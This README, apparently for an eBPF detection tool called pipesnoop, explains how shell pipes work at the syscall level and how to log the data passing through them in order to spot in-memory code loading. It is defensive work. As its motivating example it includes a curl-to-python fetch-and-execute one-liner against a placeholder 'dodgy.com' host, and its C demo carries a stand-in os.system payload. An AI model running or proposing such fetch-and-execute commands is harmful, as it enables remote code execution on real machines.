Example program using eBPF to log data being passed between programs using shell pipes

BPF-PipeSnoop


Accompanies my blog post, Using eBPF to uncover in-memory loading.

Overview

Shells can pass data between programs using pipes, e.g.:

curl https://dodgy.com/loader.py | python -

In this example, a Python script is downloaded from the internet and executed without ever being written to disk. The URL shows up in curl's arguments, but the script's content is not visible on the command line or in a process listing.

pipesnoop is a demonstration of how you could detect data being passed through a pipe and log it, all using eBPF.

Building

# First clone the repository and the libbpf submodule
git clone --recursive https://github.com/pathtofile/bpf-pipesnoop.git
cd bpf-pipesnoop/src
make

This should generate the program pipesnoop in the same directory.

Running

Just run as root and watch the output:

sudo ./pipesnoop

How it works

(Note: experts will have a better description than this.) When bash is given a command that runs two programs with a pipe between them, a number of things happen. If the example is:

bash -c "apple | banana"

Then this will happen:

Bash pipe

bash will use the pipe syscall to create an anonymous pipe. This returns two file descriptors, one for each end of the pipe, e.g. fd 3 for the read end and fd 4 for the write end.

Bash clone

bash will fork twice (the clone syscall on Linux) to create apple and banana. Both children inherit all of bash's fds, so they also have fds 3 and 4. Important note: this means both apple and banana start running at (almost) the same time, i.e. banana does not wait for apple to finish before running.

Apple close and dup2

The child that will become apple closes the read end of the pipe, e.g. fd 3, then calls dup2 to overwrite its stdout (fd 1) with the write end that is still open, e.g. dup2(4, 1), before it execs apple.

Banana close and dup2

The child that will become banana closes the write end of the pipe, e.g. fd 4, then calls dup2 to overwrite its stdin (fd 0) with the read end that is still open, e.g. dup2(3, 0), before it execs banana.

Apple write

apple will start writing data to stdout like normal, but because of the dup2 call it ends up in the pipe instead.

Banana read

banana will start reading data from its stdin like normal, but because of the dup2 call it ends up reading from the pipe instead.

Pipe close

When apple exits, its copy of the write end is closed. Once every write end of the pipe is closed (bash has to close its own copies of fds 3 and 4 too, otherwise the pipe never drains), read in banana returns 0, i.e. end of file, so banana knows apple has finished.
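The full sequence above, reproduced in C so it can be stepped through or traced. This is an added example, not code from pipesnoop or from bash; apple and banana are stand-ins that write to and read from their redirected fds directly instead of calling exec, and a second pipe (result) is added purely to hand banana's data back to the parent for checking. fd_is_pipe shows the user-space version of the question a tracer has to answer on every write or read, namely whether the target fd is one end of a pipe; in the kernel the equivalent is the inode mode of the file behind the fd.

```c
// Added example: the pipe / fork / dup2 / write / read / EOF sequence that
// bash performs for `apple | banana`, without exec so it is self-contained.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

// Returns 1 if fd is one end of a pipe (FIFO), 0 if not, -1 on error.
// User-space analogue of the check a pipe tracer needs for each fd.
int fd_is_pipe(int fd) {
    struct stat st;
    if (fstat(fd, &st) != 0) return -1;
    return S_ISFIFO(st.st_mode) ? 1 : 0;
}

// Run "apple | banana": apple writes `payload` to its stdout, banana reads its
// stdin until EOF. Returns the number of bytes banana read (copied, NUL
// terminated, into `out`), or -1 on error.
ssize_t run_pipeline(const char *payload, char *out, size_t outlen) {
    int pipefd[2];   // pipefd[0] = read end (e.g. fd 3), pipefd[1] = write end (e.g. fd 4)
    int result[2];   // extra pipe, only so the parent can collect what banana read
    if (pipe(pipefd) != 0 || pipe(result) != 0) return -1;   // 1. pipe()

    pid_t apple = fork();                         // 2. first child -> apple
    if (apple < 0) return -1;
    if (apple == 0) {
        close(pipefd[0]);                         // 3. drop the read end ...
        dup2(pipefd[1], STDOUT_FILENO);           //    ... and make fd 1 the write end
        close(pipefd[1]);
        close(result[0]);
        close(result[1]);
        // 5. apple "writes to stdout like normal"; it lands in the pipe
        write(STDOUT_FILENO, payload, strlen(payload));
        _exit(0);                                 // 7. exit closes fd 1, the last write end
    }

    pid_t banana = fork();                        // 2. second child -> banana, not waiting for apple
    if (banana < 0) return -1;
    if (banana == 0) {
        close(pipefd[1]);                         // 4. drop the write end ...
        dup2(pipefd[0], STDIN_FILENO);            //    ... and make fd 0 the read end
        close(pipefd[0]);
        close(result[0]);
        char buf[4096];
        ssize_t n;
        // 6. banana "reads from stdin like normal" until read() returns 0 (EOF)
        while ((n = read(STDIN_FILENO, buf, sizeof buf)) > 0)
            write(result[1], buf, (size_t)n);
        _exit(0);
    }

    // The shell must close its own copies, or banana never sees EOF.
    close(pipefd[0]);
    close(pipefd[1]);
    close(result[1]);

    ssize_t total = 0, n;
    while (total < (ssize_t)outlen - 1 &&
           (n = read(result[0], out + total, outlen - 1 - (size_t)total)) > 0)
        total += n;
    out[total] = '\0';
    close(result[0]);
    waitpid(apple, NULL, 0);
    waitpid(banana, NULL, 0);
    return total;
}

int main(void) {
    char out[256];
    // Constructed stand-in for the script body that would flow through `curl ... | python -`
    ssize_t n = run_pipeline("import os; os.system('id')\n", out, sizeof out);
    printf("banana read %zd bytes via the pipe: %s", n, out);
    int p[2];
    if (pipe(p) == 0)
        printf("fd %d is a pipe: %d, stdout is a pipe: %d\n", p[1], fd_is_pipe(p[1]), fd_is_pipe(STDOUT_FILENO));
    return 0;
}
```

Running it under strace -f shows exactly the syscalls the section lists (pipe2, clone, close, dup2, write, read, exit), which is also a quick way to confirm which of them a tracer like pipesnoop needs to hook to see the data.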

Acknowledgements

The skeleton of this project was made with the help of libbpf-bootstrap.
